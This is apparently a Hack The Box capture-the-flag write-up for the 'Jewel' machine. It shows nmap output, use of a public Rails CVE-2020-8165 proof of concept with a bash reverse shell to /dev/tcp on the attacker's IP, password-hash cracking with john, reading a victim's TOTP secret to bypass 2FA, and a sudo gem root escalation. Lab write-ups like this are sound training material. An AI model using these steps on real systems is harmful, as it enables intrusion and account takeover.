# Jewel ~ Hack The Box

* * *

### Prerequisite

![Jewel ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985610495/0a9fc841-e5ee-4dfa-8910-cdfb9bcde2ae.jpeg)

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

    echo "10.10.10.211	jewel.htb" >> /etc/hosts

hosts file entry

![Jewel ~ Hack The Box](/content/images/2021/02/image-90.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

     nmap -Pn -sC -sV -A -p- -oN initial jewel.htb

    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
    |   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
    |_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
    8000/tcp open  http    Apache httpd 2.4.38
    |_http-generator: gitweb/2.20.1 git/2.20.1
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-open-proxy: Potentially OPEN proxy.
    |_Methods supported:CONNECTION
    |_http-server-header: Apache/2.4.38 (Debian)
    | http-title: jewel.htb Git
    |_Requested resource was http://jewel.htb:8000/gitweb/
    8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
    |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
    |_http-title: BL0G!

### Scanning & Enumeration

Based on the scan that was run, I realized that port 8000 was running a web server. This was the web app that was being served!

![Jewel ~ Hack The Box](/content/images/2021/02/image-93.png)

![Jewel ~ Hack The Box](/content/images/2021/02/image-94.png)

Enumerating further revealed the app that was running and its version.

*   Rails = V 5.2.2.1

I was able to find an existing CVE for this version of rails and a [POC](https://github.com/hybryx/CVE-2020-8165).

### Exploitation

With the help of the POC, I was able to gain a minimal shell on the remote box that was running `rails 5.2.2.1`.

First I had to create an account on the blog which was running on port 8080

![Jewel ~ Hack The Box](/content/images/2021/02/image-95.png)

Once I had that account created, I was ready to run the exploit.

![Jewel ~ Hack The Box](/content/images/2021/02/image-96.png)

    ┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
    └─# python3 exploit.py 10.10.10.211 8080 hello@neeranjan.com nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"

![Jewel ~ Hack The Box](/content/images/2021/02/image-97.png)

User.txt flag

I was able to gain a stable shell to the user account.

### Privilege Escalation

For this, I utilized `Linpeas` as I always do! The privesc script returned a password hash belonging to bill.

![Jewel ~ Hack The Box](/content/images/2021/02/image-98.png)

![Jewel ~ Hack The Box](/content/images/2021/02/image-99.png)

    [+] Searching specific hashes inside files - less false positives (limit 70)
    /home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

I headed off to crack the password with my trusty [dictionary](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Most-Popular-Letter-Passes.txt) from seclists and good ol' john!

![Jewel ~ Hack The Box](/content/images/2021/02/image-100.png)

    ┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
    └─# john password.hash -w=passwd.dict 

Followed by that, I tried to run `sudo -l` to see what binaries.

![Jewel ~ Hack The Box](/content/images/2021/02/image-101.png)

However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a `.google_authenticator` file in the home directory of bill.

![Jewel ~ Hack The Box](/content/images/2021/02/image-102.png)

    bill@jewel:~$ cat .google_authenticator 
    2UQI3R52WFCLE6JTLDCSJYMJH4
    " WINDOW_SIZE 17
    " TOTP_AUTH

I then activated the authenticator on my phone and was able to get it working!~

![Jewel ~ Hack The Box](/content/images/2021/02/image-103.png)

And finally, I was able to run `sudo -l` using bill's account without any issues.

![Jewel ~ Hack The Box](/content/images/2021/02/image-104.png)

Now that I knew bill could run `gem` with sudo privileges, all there was left to do was head to [GTFObins](https://gtfobins.github.io/gtfobins/gem/) and get root!

    sudo gem open -e "/bin/sh -c /bin/sh" rdoc

![Jewel ~ Hack The Box](/content/images/2021/02/image-105.png)

rooty!
